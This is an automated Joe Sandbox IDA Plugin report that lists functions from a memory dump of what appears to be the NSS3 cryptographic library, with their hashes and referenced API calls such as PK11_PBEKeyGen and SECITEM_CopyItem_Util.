Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_Util$Free$ArenaEncodeErrorFindInteger_Mark_Tag_
String ID:
API String ID: 1625981074-0
Opcode ID: 68de03f1f7aaafb4c4c700bf3ae86889f3d75aa1b926a9659acdfcc8de303d6d
Instruction ID: 5de0180ca4d6c1a6b4245598887ed940c1c4c0749adcc95225b1aedcebc1b546
Opcode Fuzzy Hash: 68de03f1f7aaafb4c4c700bf3ae86889f3d75aa1b926a9659acdfcc8de303d6d
Instruction Fuzzy Hash: CA5128B1F002069BEB10CEA5DC84BAA73B5EF5531CF150134ED19A7782E731E905C79A

Function 6C6A8B60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 173stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6A8B93
PL_strncasecmp.NSS3(?,OID.,00000004), ref: 6C6A8BAA
SECITEM_CopyItem_Util.NSS3(?,00000000,?), ref: 6C6A8D28
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A8D44
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6A8D72

Strings

OID., xrefs: 6C6A8BA4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CopyErrorItem_L_strncasecmpUtilmemcpystrlen
String ID: OID.
API String ID: 4247295491-3585844982
Opcode ID: ff02396908c4f17e4e32a78eee65b6131679a5749aae800c6be684e598e725a7
Instruction ID: 90e2de3aec1b94500fd918c242c0215691723c83a9d060f4e5a684f1b5bc6fa1
Opcode Fuzzy Hash: ff02396908c4f17e4e32a78eee65b6131679a5749aae800c6be684e598e725a7
Instruction Fuzzy Hash: A95129B1B051685BCB20DB58CC8079AB7E4EB59348F0445AAE91ADBB61D3309D86CF9C

Function 6C666980 Relevance: 10.6, APIs: 7, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 6C665DB0: NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C665DEC
Part of subcall function 6C665DB0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C665E0F

SECITEM_DupItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6669BA

Part of subcall function 6C6AFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C659003,?), ref: 6C6AFD91
Part of subcall function 6C6AFD80: PORT_Alloc_Util.NSS3(A4686C6B,?), ref: 6C6AFDA2
Part of subcall function 6C6AFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C6B,?,?), ref: 6C6AFDC4

VFY_EndWithSignature.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6C666A59
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C666AB7
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C666ACA
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C666AE0
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C666AE9

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Alloc_Item_free$AlgorithmDestroyErrorPolicyPublicSignatureWithZfreememcpy
String ID:
API String ID: 2730469119-0
Opcode ID: 229457f93fb9fa112067e64616137d21d5f7cce8143d44a2f4b8c92f36e8d9c6
Instruction ID: d9c248fd2261dc56041ef77b440538de207de1b61ebdc542273f146a12c9fb97
Opcode Fuzzy Hash: 229457f93fb9fa112067e64616137d21d5f7cce8143d44a2f4b8c92f36e8d9c6
Instruction Fuzzy Hash: FB41D3716406049BEB10DF65EC49B9B77E9BF85354F188438E85AC7B40EF31E80187AA

Function 6C6B89A0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3 ref: 6C6B89DF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6B89EA
SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C6B8A04

Part of subcall function 6C6BBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C6B800A,00000000,?,00000000,?), ref: 6C6BBC3F

PK11_PBEKeyGen.NSS3(00000000,?,?,00000000,?), ref: 6C6B8A47
PK11_GetInternalKeySlot.NSS3 ref: 6C6B8A7E
PK11_PBEKeyGen.NSS3(00000000,?,00000000,00000000,?), ref: 6C6B8A96

Part of subcall function 6C69F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C69F854
Part of subcall function 6C69F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C69F868
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C69F882
Part of subcall function 6C69F820: free.MOZGLUE(04C483FF,?,?), ref: 6C69F889
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C69F8A4
Part of subcall function 6C69F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C69F8AB
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C69F8C9
Part of subcall function 6C69F820: free.MOZGLUE(280F10EC,?,?), ref: 6C69F8D0

SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C6B8AD4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$K11_Util$CriticalDeleteItem_Section$CopyInternalSlot$AlgorithmTag_Zfree
String ID:
API String ID: 3389286309-0
Opcode ID: 2ad2ffb0b2863094c597c0ec36faa0ecf1e1d70a9692567fc159116f1d989595
Instruction ID: ff0a4d920aac26e1793843bd0192b91c4c5611553fe28f6b60bbbe1bd310b8b7
Opcode Fuzzy Hash: 2ad2ffb0b2863094c597c0ec36faa0ecf1e1d70a9692567fc159116f1d989595
Instruction Fuzzy Hash: E94116756002067FD700AE55DD41BAB7678EB49708F044026FD0897B52E732E92587EB

Function 6C69AC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C69AB3E,?,?,?), ref: 6C69AC35

Part of subcall function 6C67CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C67CF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C69AB3E,?,?,?), ref: 6C69AC55

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C69AB3E,?,?), ref: 6C69AC70

Part of subcall function 6C67E300: TlsGetValue.KERNEL32 ref: 6C67E33C
Part of subcall function 6C67E300: EnterCriticalSection.KERNEL32(?), ref: 6C67E350
Part of subcall function 6C67E300: PR_Unlock.NSS3(?), ref: 6C67E5BC
Part of subcall function 6C67E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C67E5CA
Part of subcall function 6C67E300: TlsGetValue.KERNEL32 ref: 6C67E5F2
Part of subcall function 6C67E300: EnterCriticalSection.KERNEL32(?), ref: 6C67E606
Part of subcall function 6C67E300: PORT_Alloc_Util.NSS3(?), ref: 6C67E613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C69AC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C69AB3E), ref: 6C69ACD7
PORT_Alloc_Util.NSS3(?), ref: 6C69AD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C69AD2B

Part of subcall function 6C67F360: TlsGetValue.KERNEL32(00000000,?,6C69A904,?), ref: 6C67F38B
Part of subcall function 6C67F360: EnterCriticalSection.KERNEL32(?,?,?,6C69A904,?), ref: 6C67F3A0
Part of subcall function 6C67F360: PR_Unlock.NSS3(?,?,?,?,6C69A904,?), ref: 6C67F3D3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 2d0c11b89fa4d314802e7e8a1f8c3df46124a625cc52c9ca8816609cd61827d6
Instruction ID: 009fc838e1745d02e2a34b7818b0b48fb77a0416a04a5c2b64bb0612863f212c
Opcode Fuzzy Hash: 2d0c11b89fa4d314802e7e8a1f8c3df46124a625cc52c9ca8816609cd61827d6
Instruction Fuzzy Hash: D93129B1E002069FEB008F658C449AF77F6EF85328B188529E8155BB41EB31DD15C7B9

Function 6C652920 Relevance: 10.6, APIs: 7, Instructions: 121timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C65294E

Part of subcall function 6C6B1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C651D97,?,?), ref: 6C6B1836

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C65296A
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C652991

Part of subcall function 6C6B1820: PR_SetError.NSS3(FFFFE005,00000000,?,6C651D97,?,?), ref: 6C6B184D

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C6529AF
PR_Now.NSS3 ref: 6C652A29
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C652A50
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C652A79

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: TimeUtil$Choice_Decode$Error$GeneralizedTime_
String ID:
API String ID: 2509447271-0
Opcode ID: b7200e24a630ce5c54e316a2fcc435469e7dc0ea8786260d585a6c69667a5e9d
Instruction ID: 90040e96341df402027c62c47ed7b20c007b10f3045273d17f625ddfb8ac68fa
Opcode Fuzzy Hash: b7200e24a630ce5c54e316a2fcc435469e7dc0ea8786260d585a6c69667a5e9d
Instruction Fuzzy Hash: EA41B275B08311AFC710CF28C844A4FB3E5ABD9714F654A2DF89893704E730E9198B9A

Function 6C678C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C678C7C

Part of subcall function 6C719DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DC6
Part of subcall function 6C719DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C760A27), ref: 6C719DD1
Part of subcall function 6C719DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C719DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C678CB0
TlsGetValue.KERNEL32 ref: 6C678CD1
EnterCriticalSection.KERNEL32(?), ref: 6C678CE5
PR_Unlock.NSS3(?), ref: 6C678D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C678D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C678D93

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 0cee7377bdfb43a627ddb0c0c9ab9afe3ea5a96e6474638fbb16ff66c50419e5
Instruction ID: bc14d1f786a2a1f66e5fb678229d84f920ddba061b3f80dd76f9078290abce55
Opcode Fuzzy Hash: 0cee7377bdfb43a627ddb0c0c9ab9afe3ea5a96e6474638fbb16ff66c50419e5
Instruction Fuzzy Hash: E7315571A00205AFE7209F68CD44BEAB7B0FF19318F140536EA1967B60D770AD24C7E9

Function 6C672E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C66E728,?,00000038,?,?,00000000), ref: 6C672E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C672E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C672E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C672E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C672E9E
PR_Unlock.NSS3(?), ref: 6C672EAB
PR_Unlock.NSS3(?), ref: 6C672F0D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: ea536a30826d760c6ed48a5676f5a0cc77fa18eab21892cb315162cdc5cd192f
Instruction ID: 7086a1547b0b6a3754f656a697d6b2f7c0e9920d098c0470c92997f72c873469
Opcode Fuzzy Hash: ea536a30826d760c6ed48a5676f5a0cc77fa18eab21892cb315162cdc5cd192f
Instruction Fuzzy Hash: B431E475A00505ABEB105F68EC448BAB775EF46358B048574EC1887A11FB31EC65C7E9

Function 6C6BCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C6BCD93,?), ref: 6C6BCEEE

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6BCD93,?), ref: 6C6BCEFC

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6BCD93,?), ref: 6C6BCF0B

Part of subcall function 6C6B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6B08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6BCD93,?), ref: 6C6BCF1D

Part of subcall function 6C6AFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6A8D2D,?,00000000,?), ref: 6C6AFB85
Part of subcall function 6C6AFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6AFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C6BCD93,?,?,?,?,?,?,?,?,?,?,?,6C6BCD93,?), ref: 6C6BCF78

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 16ba786e57d150884e2954345e4da23bec673fbe68648ccc5d555f5f0d27a667
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 6D11E4B1E002047BEB00AA667C51B6BB5EC9F4524DF004039FC0AE7741FB70DA2887BA

Function 6C6C68A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6C6C68B4

Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190AB
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190C9
Part of subcall function 6C719090: EnterCriticalSection.KERNEL32 ref: 6C7190E5
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C719116
Part of subcall function 6C719090: LeaveCriticalSection.KERNEL32 ref: 6C71913F

Part of subcall function 6C640F00: PR_GetPageSize.NSS3(6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F1B
Part of subcall function 6C640F00: PR_NewLogModule.NSS3(clock,6C640936,FFFFE8AE,?,6C5D16B7,00000000,?,6C640936,00000000,?,6C5D204A), ref: 6C640F25

PR_MillisecondsToInterval.NSS3(?), ref: 6C6C68E6
PR_MillisecondsToInterval.NSS3(?), ref: 6C6C6938
PR_MillisecondsToInterval.NSS3(?), ref: 6C6C6986
PR_ExitMonitor.NSS3(?), ref: 6C6C69BA

Strings

nvl, xrefs: 6C6C68D2, 6C6C6924, 6C6C6972

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: IntervalMillisecondsValue$CriticalEnterMonitorSection$ExitLeaveModulePageSize
String ID: nvl
API String ID: 1802314673-2622381835
Opcode ID: 0df9702ae07de88d4c63b976deb691bd0c77cb8aab9481b79ece69511080ae32
Instruction ID: 1415c18911957d96eb2db94c0d8f168ab939b8c50861c640f73f699ab879dd86
Opcode Fuzzy Hash: 0df9702ae07de88d4c63b976deb691bd0c77cb8aab9481b79ece69511080ae32
Instruction Fuzzy Hash: F9319175705A02ABDB145B70D90C7E6BA70BF4630EF040239D82992A51D734B869CEDF

Function 6C668C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C668C1B
EnterCriticalSection.KERNEL32 ref: 6C668C34
PL_ArenaAllocate.NSS3 ref: 6C668C65
PR_Unlock.NSS3 ref: 6C668C9C
PR_Unlock.NSS3 ref: 6C668CB6

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

Strings

KRAM, xrefs: 6C668C8F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: ba726d3de627fab06c18c243c56e499a17b65abe65e777fc0eee1a79424ce87a
Instruction ID: 76328f497f12a5b1d249a6ff8bd83f0491ada62fe47fbed3f0cd1a15e1d93497
Opcode Fuzzy Hash: ba726d3de627fab06c18c243c56e499a17b65abe65e777fc0eee1a79424ce87a
Instruction Fuzzy Hash: 772197B16056019FD700AF79C484559F7F4FF0A308F05896ED884CBB11DB35E885CB9A

Function 6C678E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C692E62,?,?,?,?,?,?,?,00000000,?,?,?,6C664F1C), ref: 6C678EA2

Part of subcall function 6C69F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C69F854
Part of subcall function 6C69F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C69F868
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C69F882
Part of subcall function 6C69F820: free.MOZGLUE(04C483FF,?,?), ref: 6C69F889
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C69F8A4
Part of subcall function 6C69F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C69F8AB
Part of subcall function 6C69F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C69F8C9
Part of subcall function 6C69F820: free.MOZGLUE(280F10EC,?,?), ref: 6C69F8D0

